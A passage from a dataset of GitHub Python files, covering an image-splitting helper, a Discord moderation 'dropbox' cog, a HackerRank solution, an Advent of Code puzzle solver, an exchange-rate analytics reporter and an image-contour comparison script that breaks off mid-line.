[block_col]\n\n    return image_blocks\n\n\ndef save_split_image(img_dir: str, row_number: int = 9, col_number: int = 9, delete: bool = True) -> None:\n    r\"\"\" Save the split image.\n\n    Args:\n        img_dir (str): Original image folder to be processed.\n        row_number (int): Split along the width of the image. (Default: 9).\n        col_number (int): Split along the height of the image. (Default: 9).\n        delete (optional, bool): Whether to delete the original image after processing. 
(Default:``True``).\n \"\"\"\n __constant__ = [\"delete\"]\n delete: bool\n\n for filename in glob.glob(f\"{img_dir}/*\"):\n img = cv2.imread(filename)\n image_blocks = split_for_slicling(img, row_number=row_number, col_number=col_number)\n for row in range(row_number):\n for col in range(col_number):\n image_blocks[row][col] = Image.fromarray(cv2.cvtColor(image_blocks[row][col], cv2.COLOR_BGR2RGB))\n image_blocks[row][col].save(f\"{img_dir}/{filename.split('/')[-1].split('.')[0]}_{row}_{col}.bmp\")\n if delete:\n os.remove(filename)\n\n\nif __name__ == \"__main__\":\n save_split_image(\"./4x/train/input\")\n","repo_name":"anneouyang/noisy-superres","sub_path":"ESRGAN-PyTorch/data/split_image.py","file_name":"split_image.py","file_ext":"py","file_size_in_byte":2193,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"35"} +{"seq_id":"2851691291","text":"import asyncio\nimport io\nfrom asyncio import CancelledError\n\nimport aiohttp\nimport discord\nimport tortoise.exceptions\nfrom discord import Forbidden, Embed, NotFound, HTTPException\nfrom discord.ext import commands, tasks\nfrom discord.utils import utcnow\nfrom tortoise.exceptions import DoesNotExist\n\nimport utils.Logging\nfrom utils.Logging import TCol\nfrom cogs.BaseCog import BaseCog\nfrom utils import Lang, Questions, Utils, Logging\nfrom utils.Database import DropboxChannel\n\n\nclass DropBox(BaseCog):\n\n def __init__(self, bot):\n super().__init__(bot)\n self.dropboxes = dict()\n self.responses = dict()\n self.drop_messages = dict()\n self.delivery_in_progress = dict()\n self.delete_in_progress = dict()\n self.clean_in_progress = False\n\n async def on_ready(self):\n await self.bot.wait_until_ready()\n Logging.info(f\"\\t{TCol.cOkBlue}starting DropBox{TCol.cEnd}\")\n\n for guild in self.bot.guilds:\n # fetch dropbox channels per server\n await self.init_guild(guild.id)\n for row in await DropboxChannel.filter(serverid=guild.id):\n self.dropboxes[guild.id][row.sourcechannelid] = row\n\n # TODO: replace with asyncio queue?\n if not self.deliver_to_channel.is_running():\n self.deliver_to_channel.start()\n if not self.clean_channels.is_running():\n self.clean_channels.start()\n\n async def init_guild(self, guild_id):\n self.dropboxes[guild_id] = dict()\n self.drop_messages[guild_id] = dict()\n self.delivery_in_progress[guild_id] = dict()\n self.delete_in_progress[guild_id] = dict()\n\n def cog_unload(self):\n self.deliver_to_channel.cancel()\n self.clean_channels.cancel()\n\n async def cog_check(self, ctx):\n return ctx.guild is not None \\\n and (ctx.author.guild_permissions.ban_members or await self.bot.permission_manage_bot(ctx))\n\n @commands.Cog.listener()\n async def on_guild_join(self, guild):\n await self.init_guild(guild.id)\n\n @commands.Cog.listener()\n async def on_guild_remove(self, guild):\n del self.dropboxes[guild.id]\n del self.drop_messages[guild.id]\n del self.delivery_in_progress[guild.id]\n del self.delete_in_progress[guild.id]\n await DropboxChannel.filter(serverid=guild.id).delete()\n\n # TODO: replace with asyncio queue?\n @tasks.loop(seconds=10.0)\n async def deliver_to_channel(self):\n send_tasks = []\n for guild_id, guild_queue in self.drop_messages.items():\n for channel_id, message_queue in guild_queue.items():\n try:\n # get dropbox channel\n drop_channel = self.bot.get_channel(self.dropboxes[guild_id][channel_id].targetchannelid)\n working_queue = dict(message_queue)\n for message_id, message in working_queue.items():\n if channel_id not in 
self.delivery_in_progress[guild_id]:\n self.delivery_in_progress[guild_id][channel_id] = set()\n if message_id not in self.delivery_in_progress[guild_id][channel_id]:\n self.delivery_in_progress[guild_id][channel_id].add(message_id)\n send_tasks.append(self.bot.loop.create_task(self.drop_message_impl(message, drop_channel)))\n except Exception as e:\n pass\n try:\n if send_tasks:\n await asyncio.gather(*send_tasks)\n except CancelledError as e:\n raise e\n except Exception as e:\n await Utils.handle_exception(\"Dropbox gather send tasks failed\", self.bot, e)\n\n async def drop_message_impl(self, source_message, drop_channel):\n \"\"\"\n handles copying to dropbox, sending confirm message in channel, sending dm receipt, and deleting original\n for each message in any dropbox\n \"\"\"\n guild_id = source_message.channel.guild.id\n source_channel_id = source_message.channel.id\n source_message_id = source_message.id\n\n # get the ORM row for this dropbox.\n drop = None\n if source_channel_id in self.dropboxes[guild_id]:\n drop = self.dropboxes[guild_id][source_channel_id]\n else:\n # should only return one entry because of how rows are added\n drop = await DropboxChannel.filter(serveri=guild_id, sourcechannelid=source_channel_id)\n\n # the embed to display who was the author in dropbox channel\n embed = Embed(\n timestamp=source_message.created_at,\n color=0x663399)\n avatar = source_message.author.avatar.replace(size=32) if source_message.author.avatar else None\n embed.set_author(name=f\"{source_message.author} ({source_message.author.id})\",\n icon_url=avatar)\n embed.add_field(name=\"Author link\", value=source_message.author.mention)\n ctx = await self.bot.get_context(source_message)\n\n pages = Utils.paginate(source_message.content)\n page_count = len(pages)\n\n if source_message.author.dm_channel is None:\n await source_message.author.create_dm()\n dm_channel = source_message.author.dm_channel\n\n attachment_names = []\n delivery_success = None\n last_drop_message = None\n\n try:\n # send embed and message to dropbox channel\n for attachment in source_message.attachments:\n try:\n buffer = io.BytesIO()\n await attachment.save(buffer)\n await drop_channel.send(file=discord.File(buffer, attachment.filename))\n attachment_names.append(attachment.filename)\n except Exception as attach_e:\n await drop_channel.send(\n Lang.get_locale_string('dropbox/attachment_fail', ctx, author=source_message.author.mention))\n \n if len(pages) == 0:\n # means no text content included\n if len(attachment_names) < 1:\n # if there aren't any attachments, include a message indicating that\n last_drop_message = await drop_channel.send(\n embed=embed, content=Lang.get_locale_string('dropbox/msg_blank', ctx))\n else:\n last_drop_message = await drop_channel.send(embed=embed)\n else:\n # deliver all the pages of text content\n for i, page in enumerate(pages[:-1]):\n if len(pages) > 1:\n page = f\"**{i+1} of {page_count}**\\n{page}\"\n await drop_channel.send(page)\n last_page = pages[-1] if page_count == 1 else f\"**{page_count} of {page_count}**\\n{pages[-1]}\"\n last_drop_message = await drop_channel.send(embed=embed, content=last_page)\n \n # TODO: try/ignore: add reaction for \"claim\" \"flag\" \"followup\" \"delete\"\n msg = Lang.get_locale_string('dropbox/msg_delivered', ctx, author=source_message.author.mention)\n await ctx.send(msg)\n delivery_success = True\n except Exception as e:\n delivery_success = False\n msg = Lang.get_locale_string('dropbox/msg_not_delivered', ctx, 
author=source_message.author.mention)\n await ctx.send(msg)\n await self.bot.guild_log(guild_id, \"broken dropbox...? Call alex, I guess\")\n await Utils.handle_exception(\"dropbox delivery failure\", self.bot, e)\n\n try:\n # delete original message, the confirmation of sending is deleted in clean_channels loop\n await source_message.delete()\n del self.drop_messages[guild_id][source_channel_id][source_message_id]\n set(self.delivery_in_progress[guild_id][source_channel_id]).remove(source_message_id)\n except discord.errors.NotFound as e:\n # ignore missing message\n pass\n\n # give senders a moment before spam pinging them the copy\n await asyncio.sleep(1)\n\n try:\n # try sending dm receipts and report in dropbox channel if it was sent or not\n if drop and drop.sendreceipt:\n # get the locale versions of the messages for status, receipt header, and attachments ready to be sent\n status_msg = Lang.get_locale_string(\n 'dropbox/msg_delivered' if delivery_success else 'dropbox/msg_not_delivered', ctx, author=\"\")\n receipt_msg_header = Lang.get_locale_string('dropbox/msg_receipt', ctx, channel=ctx.channel.mention)\n if len(attachment_names) == 0:\n attachment_msg = \"\"\n else:\n attachment_msg_key = 'dropbox/receipt_attachment_plural' if len(attachment_names) > 1 else 'dropbox/receipt_attachment_singular'\n attachment_msg = Lang.get_locale_string(\n attachment_msg_key, \n ctx, \n number=len(attachment_names), \n attachments=\", \".join(attachment_names)\n )\n # might as well try to stuff in as few pages as possible\n dm_header_pages = Utils.paginate(f\"{status_msg}\\n{receipt_msg_header}\\n{attachment_msg}\")\n\n for page in dm_header_pages:\n await dm_channel.send(page)\n\n if len(pages) == 0:\n # no text content\n if len(attachment_names) < 1:\n # if no text and no attachments, then send a response that there wasn't any text content\n await dm_channel.send(content=Lang.get_locale_string('dropbox/msg_blank', ctx))\n else:\n # send the page(s) in code blocks to dm.\n for i, page in enumerate(pages[:-1]):\n if len(pages) > 1:\n page = f\"**{i+1} of {page_count}**\\n```{page}```\"\n await dm_channel.send(page)\n \n last_page = f'```{pages[-1]}```' if page_count == 1 else f\"**{page_count} of {page_count}**\\n```{pages[-1]}```\"\n await dm_channel.send(last_page)\n if delivery_success and last_drop_message is not None:\n embed.add_field(name=\"receipt status\", value=\"sent\")\n # this is used if drop first before dms to add status to embed\n edited_message = await last_drop_message.edit(embed=embed)\n except Exception as e:\n Logging.info(\"Dropbox DM receipt failed, not an issue so ignoring exception and giving up\")\n if drop.sendreceipt and delivery_success:\n embed.add_field(name=\"receipt status\", value=\"failed\")\n # this is used if drop first before dms to add status to embed\n if last_drop_message is not None:\n edited_message = await last_drop_message.edit(embed=embed)\n\n @tasks.loop(seconds=3.0)\n async def clean_channels(self):\n if self.clean_in_progress:\n return\n\n self.clean_in_progress = True\n\n for guild in self.bot.guilds:\n for channel_id, drop in dict(self.dropboxes[guild.id]).items():\n if drop.deletedelayms == 0:\n # do not clear from dropbox channels with no delay set.\n continue\n\n channel = None\n # Look for channel history. 
Try 10 times to fetch channel history\n # this API call fails on startup because connection is not made yet.\n now = utcnow()\n channel = self.bot.get_channel(channel_id)\n if channel_id not in self.delete_in_progress[guild.id]:\n self.delete_in_progress[guild.id][channel_id] = set()\n\n try:\n clean_tasks = []\n async for message in channel.history(limit=20):\n # check if message is queued for delivery\n if (channel_id in self.drop_messages[guild.id]) and\\\n (message.id in self.drop_messages[guild.id][channel_id]):\n # don't delete messages that are queued\n continue\n my_member = guild.get_member(message.author.id)\n if my_member is None:\n continue\n is_mod = my_member.guild_permissions.ban_members or await self.bot.member_is_admin(my_member.id)\n age = (now-message.created_at).seconds\n expired = age > drop.deletedelayms / 1000\n\n try:\n queued_for_delete = message.id in self.delete_in_progress[guild.id][channel_id]\n except KeyError:\n # bot is restarting - stop processing and pick this up next time\n break\n\n # periodically clear out expired messages sent by bot and non-mod\n if expired and not queued_for_delete and (message.author.bot or not is_mod):\n self.delete_in_progress[guild.id][channel_id].add(message.id)\n self.bot.loop.create_task(self.clean_message(message))\n else:\n pass\n if clean_tasks:\n await asyncio.gather(*clean_tasks)\n except (CancelledError, asyncio.TimeoutError, discord.DiscordServerError, NotFound, RuntimeError) as e:\n # I think these are safe to ignore...\n pass\n except aiohttp.ClientOSError:\n await self.bot.guild_log(guild.id, f\"Dropbox client error. Probably safe to ignore, but check \"\n f\"your dropbox channels to make sure they are clean.\")\n continue\n except RuntimeError as e:\n await self.bot.guild_log(guild.id, f\"Dropbox error for guild `{guild.name}`. What's broken?\")\n # fall through and report\n except Exception as e:\n # ignore but log\n await Utils.handle_exception('dropbox clean failure', self.bot, e)\n continue\n self.clean_in_progress = False\n\n async def clean_message(self, message):\n try:\n await message.delete()\n self.delete_in_progress[message.channel.guild.id][message.channel.id].remove(message.id)\n except (NotFound, HTTPException, Forbidden) as e:\n # ignore delete failure. we'll try again next time\n await Utils.handle_exception('dropbox clean_message failure', self.bot, e)\n\n @commands.group(name=\"dropbox\", invoke_without_command=True)\n @commands.guild_only()\n async def dropbox(self, ctx):\n \"\"\"List the dropbox settings. 
Use sub-commands to configure dropboxes\n\n Parameters\n ----------\n ctx\n \"\"\"\n # list dropbox channels\n embed = Embed(\n timestamp=ctx.message.created_at,\n color=0x663399,\n title=Lang.get_locale_string(\"dropbox/list\", ctx, server_name=ctx.guild.name))\n for source, dropbox in self.dropboxes[ctx.guild.id].items():\n source_channel = self.bot.get_channel(source)\n target_channel = self.bot.get_channel(dropbox.targetchannelid)\n embed.add_field(name=f\"From\",\n value=Utils.get_channel_description(self.bot, source_channel.id),\n inline=True)\n embed.add_field(name=f\"To\",\n value=Utils.get_channel_description(self.bot, target_channel.id),\n inline=True)\n embed.add_field(name=f\"Delete After\",\n value=Utils.to_pretty_time(dropbox.deletedelayms/1000) or \"off\",\n inline=True)\n embed.add_field(name=f\"send receipt\",\n value=dropbox.sendreceipt,\n inline=True)\n embed.add_field(name=\"__ __\",\n value=\"__ __\",\n inline=False)\n if len(self.dropboxes[ctx.guild.id]) == 0:\n embed.add_field(name=\"Not Set\", value=\"Add dropboxes using `dropbox add` command\")\n await ctx.send(embed=embed)\n\n @dropbox.command()\n @commands.guild_only()\n async def add(self, ctx, source_channel: discord.TextChannel, target_channel: discord.TextChannel):\n \"\"\"Add a dropbox channel. Messages sent by non-moderator members will be delivered from the source channel to a\n destination channel. Destination can be public or private, as long as the bot has access.\n\n Parameters\n ----------\n ctx\n sourceid\n ID of the source channel\n targetid\n ID of the destination channel\n\n Returns\n -------\n\n \"\"\"\n sourceid = source_channel.id\n targetid = target_channel.id\n\n # validate channel ids\n source_channel = self.bot.get_channel(sourceid)\n target_channel = self.bot.get_channel(targetid)\n if not source_channel:\n await ctx.send(Lang.get_locale_string('dropbox/channel_not_found', ctx, channel_id=sourceid))\n if not target_channel:\n await ctx.send(Lang.get_locale_string('dropbox/channel_not_found', ctx, channel_id=targetid))\n if not source_channel or not target_channel:\n # valid source and target channels are required\n return\n\n # initialize to None for the case of adding a new entry\n update_entry = None\n\n # channel descriptions\n source_description = Utils.get_channel_description(self.bot, sourceid)\n new_target_description = Utils.get_channel_description(self.bot, targetid)\n old_target_description = \"\"\n\n def update(choice):\n nonlocal update_entry\n update_entry = choice\n\n if sourceid in self.dropboxes[ctx.guild.id]:\n # existing source channel. 
ask user to confirm\n old_target_description = Utils.get_channel_description(\n self.bot,\n self.dropboxes[ctx.guild.id][sourceid].targetchannelid)\n try:\n await Questions.ask(\n self.bot,\n ctx.channel,\n ctx.author,\n Lang.get_locale_string('dropbox/override_confirmation',\n ctx,\n source=source_description,\n old_target=old_target_description,\n new_target=new_target_description),\n [\n Questions.Option('YES', handler=lambda: update(True)),\n Questions.Option('NO', handler=lambda: update(False))\n ], delete_after=True, locale=ctx)\n except asyncio.TimeoutError as e:\n update(False)\n\n if update_entry is False:\n # user chose not to update\n await ctx.send(Lang.get_locale_string('dropbox/not_updating', ctx))\n return\n\n if update_entry:\n # user chose to update\n msg = Lang.get_locale_string('dropbox/updated',\n ctx,\n source=source_description,\n old_target=old_target_description,\n new_target=new_target_description)\n else:\n # no existing source. adding a new dropbox\n msg = Lang.get_locale_string('dropbox/added',\n ctx,\n source=source_description,\n target=new_target_description)\n\n try:\n # update local mapping and save to db\n db_row, created = await DropboxChannel.get_or_create(serverid=ctx.guild.id, sourcechannelid=sourceid)\n db_row.targetchannelid = targetid\n await db_row.save()\n self.dropboxes[ctx.guild.id][sourceid] = db_row\n except Exception as e:\n await Utils.handle_exception(\"Failed to update dropbox channel\", self.bot, e)\n await ctx.send(\"Can't save dropox channel.\")\n return\n\n # message success to user\n await ctx.send(msg)\n\n @dropbox.command()\n @commands.guild_only()\n async def remove(self, ctx, source_channel: discord.TextChannel):\n \"\"\"Remove a dropbox channel. Stop delivering messages from the given channel.\n\n Parameters\n ----------\n ctx\n source_channel: discord.TextChannel\n ID of the source channel.\n\n Returns\n -------\n\n \"\"\"\n sourceid = source_channel.id\n source_description = Utils.get_channel_description(self.bot, sourceid)\n if sourceid not in self.dropboxes[ctx.guild.id]:\n await ctx.send(Lang.get_locale_string('dropbox/not_removed', ctx, source=source_description))\n return\n\n try:\n drop_row = await DropboxChannel.get(serverid=ctx.guild.id,\n sourcechannelid=sourceid)\n await drop_row.delete()\n del self.dropboxes[ctx.guild.id][sourceid]\n except DoesNotExist:\n await ctx.send(\"no such channel to remove from dropboxes\")\n except tortoise.exceptions.MultipleObjectsReturned:\n await ctx.send(\"too many dropbox channels match that id???\")\n except Exception as e:\n await Utils.handle_exception('dropbox delete failure', self.bot, e)\n raise e\n await ctx.send(Lang.get_locale_string('dropbox/removed', ctx, source=source_description))\n\n @dropbox.command(aliases=['delay', 'delete_delay'])\n @commands.guild_only()\n async def set_delay(self, ctx, channel: discord.TextChannel, delay: float):\n \"\"\"Set the lifespan for response messages in the channel\n\n Also applies to any non-mod messages, so the delay time must be greater than the initial wait for message drops.\n\n Parameters\n ----------\n ctx\n channel: discord.TextChannel\n Channel mention or ID\n delay: int\n Time until responses expire (seconds)\n \"\"\"\n if channel.id in self.dropboxes[ctx.guild.id]:\n drop_row = self.dropboxes[ctx.guild.id][channel.id]\n drop_row.deletedelayms = int(delay * 1000)\n await drop_row.save()\n t = Utils.to_pretty_time(delay)\n await ctx.send(Lang.get_locale_string('dropbox/set_delay_success', ctx, channel=channel.mention, time=t))\n 
else:\n await ctx.send(Lang.get_locale_string('dropbox/set_delay_fail', ctx, channel=channel.mention))\n\n @dropbox.command()\n @commands.guild_only()\n async def set_receipt(self, ctx, source_channel: discord.TextChannel, receipt_setting: bool):\n \"\"\"Enable/disable DM receipts. When set, a copy of each dropbox message is sent by DM to the author.\n\n Parameters\n ----------\n ctx\n source_channel: discord.TextChannel\n Channel mention or ID\n receipt_setting: bool\n Boolean (on or off, 0 or 1, yes or no)\n \"\"\"\n if source_channel.id in self.dropboxes[ctx.guild.id]:\n drop_row = self.dropboxes[ctx.guild.id][source_channel.id]\n drop_row.sendreceipt = receipt_setting\n await drop_row.save()\n msg = Lang.get_locale_string('dropbox/receipt_set_false', ctx, channel=source_channel.mention)\n if receipt_setting:\n msg = Lang.get_locale_string('dropbox/receipt_set_true', ctx, channel=source_channel.mention)\n await ctx.send(msg)\n\n @commands.Cog.listener()\n async def on_message(self, message: discord.message):\n try:\n guild_id = message.channel.guild.id\n message_not_in_guild = not hasattr(message.channel, \"guild\") or message.channel.guild is None\n author_not_in_guild = not hasattr(message.author, \"guild\")\n channel_not_in_dropboxes = message.channel.id not in self.dropboxes[guild_id]\n is_mod = message.author.guild_permissions.ban_members or await self.bot.member_is_admin(message.author.id)\n except Exception as e:\n return\n\n if message.author.bot or message_not_in_guild or author_not_in_guild or \\\n channel_not_in_dropboxes or is_mod:\n # check for dropbox matching channel id\n # ignore bots and mods/admins\n return\n\n # queue this message id for delivery/deletion\n if message.channel.id not in self.drop_messages[guild_id]:\n self.drop_messages[guild_id][message.channel.id] = dict()\n self.drop_messages[guild_id][message.channel.id][message.id] = message\n\n\nasync def setup(bot):\n await bot.add_cog(DropBox(bot))\n","repo_name":"e-a-h/That-Sky-Bot","sub_path":"cogs/DropBox.py","file_name":"DropBox.py","file_ext":"py","file_size_in_byte":25585,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"35"} +{"seq_id":"27344846066","text":"# HACKERRANK\n# https://www.hackerrank.com/challenges/largest-permutation/problem\n\n# Credits to https://www.hackerrank.com/rednithin\n\nimport sys\n\ndef largestPermutation(k, arr):\n d = {}\n for i, num in enumerate(arr):\n d[num] = i\n for i, num in enumerate(arr):\n if k == 0:\n break\n if num == len(arr) - i:\n continue\n i1 = d[num]\n i2 = d[len(arr)-i]\n\n arr[i], arr[d[len(arr)-i]] = arr[d[len(arr)-i]], arr[i]\n d[num] = i2\n d[len(arr)-i] = i1\n k -= 1\n return arr\n\nif __name__ == \"__main__\":\n n, k = input().strip().split(' ')\n n, k = [int(n), int(k)]\n arr = list(map(int, input().strip().split(' ')))\n result = largestPermutation(k, arr)\n print (\" \".join(map(str, result)))\n","repo_name":"sharadbhat/Competitive-Coding","sub_path":"HackerRank/Algorithms/Largest_Permutation.py","file_name":"Largest_Permutation.py","file_ext":"py","file_size_in_byte":781,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"5661794326","text":"import re\nfrom math import floor\nimport copy\n\ndef monkeyOperation(item, instructions):\n operand = instructions[1]\n if operand == 'old':\n return item * item\n else:\n instr = str(instructions[0] + instructions[1])\n return eval(str(item) + instr)\n\n\ndef monkeyTest(worryLevel, divisor):\n if not 
(worryLevel % divisor):\n return 't'\n else:\n return 'f'\n\n\ndef stuffSlinging(monkeys, lcm):\n for i in range(10000):\n for monkey in monkeys.values():\n currentItems = copy.copy(monkey['items'])\n for item in currentItems:\n monkey['items'].pop(0)\n newWorry = monkeyOperation(item, monkey['oper'])\n newWorry = newWorry % lcm # the result of the modulus is \n monkey['inspections'] += 1 # equal in mod sense to newWorry\n divisorTest = monkeyTest(newWorry, monkey['test'])\n nextMonkey = str(monkey[divisorTest])\n monkeys[nextMonkey]['items'].append(newWorry) \n inspections = [i['inspections'] for i in monkeys.values()]\n itms = [i['items'] for i in monkeys.values()]\n return inspections, itms\n\n\ndef main():\n monkeys = {}\n currentMonkey = 0\n lcm = 1\n with open('input202211.txt') as file:\n for line in file.readlines():\n lineList = line.split()\n nums = re.findall(r'\\d+', line)\n if not lineList:\n continue\n if lineList[0] == 'Monkey':\n currentMonkey = nums[0]\n monkeys[currentMonkey] = {'inspections':0}\n elif lineList[0] == 'Starting':\n items = [int(i) for i in nums]\n monkeys[currentMonkey]['items'] = items\n elif lineList[0] == 'Operation:':\n monkeys[currentMonkey]['oper'] = lineList[-2:]\n elif lineList[0] == 'Test:':\n monkeys[currentMonkey]['test'] = int(nums[0])\n lcm *= int(nums[0])\n elif lineList[1] == 'true:':\n monkeys[currentMonkey]['t'] = int(nums[0])\n elif lineList[1] == 'false:':\n monkeys[currentMonkey]['f'] = int(nums[0])\n insps, items = stuffSlinging(monkeys, lcm)\n insps.sort()\n monkeyBusiness = insps[-1] * insps[-2]\n print(monkeyBusiness)\n\n\nmain()","repo_name":"JonasAsker/Advent-of-code-2022","sub_path":"day11/solution11.py","file_name":"solution11.py","file_ext":"py","file_size_in_byte":2336,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"72583130020","text":"import pygamp as pg\nimport uuid\nimport requests\nfrom apscheduler.schedulers.blocking import BlockingScheduler\n\nsend_usd_rate = BlockingScheduler()\n\n\nCLIENT_ID = str(uuid.uuid4())\nPROPERTY_ID = 'UA-212228455-1'\nNBU_API_URL = 'https://bank.gov.ua/NBUStatService/v1/statdirectory/exchange?json'\n\n\ndef get_current_currency(currency):\n response = requests.get(url=NBU_API_URL)\n if response.status_code == 200:\n json_data = response.json()\n for currency_data in json_data:\n if currency_data['cc'] == currency:\n return int(currency_data['rate'] * 10000)\n else:\n return None\n\n\ndef send_currency_rate_event(currency):\n current_usd = get_current_currency(currency)\n\n if isinstance(current_usd, int):\n pg.event(\n cid=CLIENT_ID,\n property_id=PROPERTY_ID,\n category='Currency',\n action='Check currency ratio',\n label='USD',\n value=current_usd,\n non_interactive=1\n )\n else:\n print('Unable to get current currency ratio')\n\n\n@send_usd_rate.scheduled_job('interval', minutes=1)\ndef send_usd_rate_func():\n send_currency_rate_event(currency='USD')\n\n\nif __name__ == \"__main__\":\n send_usd_rate.start()\n","repo_name":"ivanovds/prjctr_highload","sub_path":"03_ga/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1250,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"69978302500","text":"# ---------- imports ---------- #\nimport numpy as np\nfrom numpy import linalg as LA\nfrom matplotlib import pyplot as plt\nfrom imageio import imread, imwrite\nfrom skimage.metrics import structural_similarity as ssim\nfrom skimage.color import rgb2gray\nimport 
cv2\n\n\n# ---------- macros ---------- #\nTWO_DIM = 2\nTHREE_DIM = 3\nMAX_GRAY_SCALE = 255\nGRAY_SCALE = 1\nTHRESHOLD = 210\nNO_PARENT = -1\nMIN_IMG_SIZE = 15 * 15\nHORIZONTAL = 1\nVERTICAL = 2\n\n\n# ---------- code ---------- #\n\ndef read_image(file_name, representation=GRAY_SCALE):\n    \"\"\"\n    reads an image file and converts it into the given representation.\n    :param file_name: the filename of an image on disk.\n    :param representation: representation code, either 1 or 2, defining whether\n    the result should be a grayscale image (1) or an RGB image (2).\n    :return: the image as an np.float32 array\n    \"\"\"\n    im = np.array(imread(file_name))\n    img_float = im.astype(np.float32)\n    if representation == 1:  # return grayscale image\n        if len(im.shape) == TWO_DIM:  # image was given in grayscale\n            return img_float\n        elif len(im.shape) == THREE_DIM:  # image is rgb, convert to grayscale\n            return rgb2gray(img_float)\n    elif representation == 2:  # return rgb\n        return img_float\n\n\ndef filter_image(img):\n    \"\"\"\n    clears noise from the given image using a bilateral filter.\n    :param img: image to filter, assumed to be of type np.float32\n    :return: the filtered image\n    \"\"\"\n    return cv2.bilateralFilter(img, 9, 50, 50)\n\n\ndef threshold_image(img, threshold=THRESHOLD):\n    \"\"\"\n    thresholds a grayscale image to a binary image.\n    :param threshold: default is 210, chosen by trial and error.\n    Assumes the image is not suited to Otsu's binarization.\n    :param img: 2D numpy array of type np.float32\n    :return: a tuple (threshold, binary image)\n    \"\"\"\n    return cv2.threshold(img, threshold, MAX_GRAY_SCALE, cv2.THRESH_BINARY)\n\n\ndef find_contours(thresh):\n    \"\"\"\n    finds contours in the image, keeping only top-level ones (not 100%!!)\n    :param thresh: binary image as np.array of type np.float32\n    :return: a list of the top-level contours found\n    \"\"\"\n    thresh = thresh.astype(np.uint8)\n    contours, hierarchy = cv2.findContours(thresh, cv2.RETR_CCOMP, cv2.CHAIN_APPROX_NONE)\n\n    # keep only contours that have no parent (top-level)\n    filtered_cont = []\n    for i in range(len(contours)):\n        if hierarchy[0, i, 3] == NO_PARENT:\n            filtered_cont.append(contours[i])\n\n    return filtered_cont\n\n\ndef mark_contours(contour_arr, img, symmetry, _plot=False):\n    \"\"\"\n    marks the contours on the image and crops them.\n    :return: python list containing the cropped sub-images.\n    \"\"\"\n    marg, flag = 7, 0\n    if _plot:\n        # the axes are needed below for drawing the bounding boxes\n        fig, ax = plt.subplots()\n        ax.imshow(img, cmap=\"gray\")\n    sub_images = []  # init array for pictures\n    for contour in contour_arr:\n\n        lower_dim = contour[:, 0]\n        x, y = lower_dim[:, 0], lower_dim[:, 1]\n        min_x, min_y, max_x, max_y = min(x), min(y), max(x), max(y)\n\n        # remove small noise\n        if (max_x - min_x) * (max_y - min_y) < MIN_IMG_SIZE:\n            continue\n        # avoid index error\n        if min_x - marg < 0 or min_y - marg < 0 or max_y + marg > img.shape[0] or max_x + marg > img.shape[1]:\n            marg = 0\n        # crop only half because the image is symmetric:\n        # TODO: address different types of symmetry as input from user\n        if symmetry == HORIZONTAL:\n            if max_x <= img.shape[1] // 2:\n                sub_images.append(img[min_y:max_y, min_x:max_x])\n                flag = 1\n        else:  # symmetry is around the X-axis\n            if max_y <= img.shape[0] // 2:\n                sub_images.append(img[min_y:max_y, min_x:max_x])\n                flag = 1\n        if _plot and flag:\n            ax.plot([min_x - marg, max_x + marg, max_x + marg, min_x - marg, min_x - marg],\n                    [min_y - marg, min_y - marg, max_y + marg, max_y + marg, min_y - marg], c='r', linewidth=0.4)\n            flag = 0\n    if _plot:\n        plt.savefig(\"found_subshapes2.jpg\")\n        # plt.show()\n    return sub_images\n\n\ndef 
rotate_images():\n    pass\n\n\ndef resize_image(img, width, height):\n    \"\"\"\n    resizes the given image to size width X height; does not edit the original\n    image.\n    :param width: integer representing the new width\n    :param height: integer representing the new height\n    :param img: np.array representing the image to resize\n    :return: a resized copy of img.\n    \"\"\"\n\n    return cv2.resize(img, (width, height))\n\n\ndef compare_img(img1, img2, err_function=\"ALL\"):\n    \"\"\"\n    Receives two images to compare (img1 being the original) and a string indicating\n    which error function to use. Does not assume the images are the same size.\n    :param err_function: string indicating which comparison func to use, supports:\n    (1) \"ALL\" - apply all functions. (2) \"MSE\" - apply MSE err function. (3) \"SSIM\" - apply structural similarity comparison\n    :param img1: np.array of type float32.\n    :param img2: np.array of type float32.\n    :return: np array containing the errors; if \"ALL\" is used then array[0] is MSE, array[1] is SSIM and array[2] is L1,\n    else it is a singleton of the chosen function.\n    \"\"\"\n\n    # make sure images are the same shape #\n    height1, width1, height2, width2 = img1.shape[0], img1.shape[1], img2.shape[0], img2.shape[1]\n    if img1.shape != img2.shape:\n        if width1 * height1 > width2 * height2:\n            img1 = resize_image(img1, width2, height2)\n        else:\n            img2 = resize_image(img2, width1, height1)\n    # TODO: create better resize to avoid interpolation when possible\n    # compare images #\n    func_arr = [mse, ssim, L1_norm]\n    err_arr = []\n    for func in func_arr:\n        if err_function == \"ALL\" or func.__name__.upper() == err_function:\n            err_arr.append(func(img1, img2))\n    return np.array(err_arr)\n\n\ndef mse(img1, img2):\n    \"\"\"\n    calculates the mean squared difference between two given images. 
assumes\n the images have the same size image\n :param img1:\n :param img2:\n :return:\n \"\"\"\n err = (np.square(img1 - img2)).mean(axis=None)\n # return the MSE, the lower the error, the more \"similar\"\n # the two images are\n return err\n\n\ndef L1_norm(img1, img2):\n \"\"\"\n\n :param img1:\n :param img2:\n :return:\n \"\"\"\n flattened1 = np.ravel(img1)\n flattened2 = np.ravel(img2)\n return LA.norm((flattened1 - flattened2), ord=1)\n\n\n# def ai_detector(input_img):\n# \"\"\"\n# finding objects in image using resNet - not functional so far!!\n# :param input_img: image to look in.\n# :return:\n# \"\"\"\n# exec_path = os.getcwd()\n#\n# detector = ObjectDetection()\n# detector.setModelTypeAsRetinaNet()\n# detector.setModelPath(os.path.join(exec_path, \"resnet50_coco_best_v2.1.0.h5\"))\n# detector.loadModel()\n#\n# detected = detector.detectObjectsFromImage(input_image=os.path.join(exec_path, input_img),\n# output_image_path=os.path.join(exec_path, \"imagenew.jpg\"))\n# for eachObj in detected:\n# print(eachObj[\"name\"], \":\", eachObj[\"percentage_probability\"])\n\n\n# if __name__ == '__main__':\n# img = read_image(\"32X32 cells, 21 ancillas, 9 transparencies, 5 R.png\")\n# filt = cv2.fastNlMeansDenoising(np.uint8(filter_image(img)), None, 10, 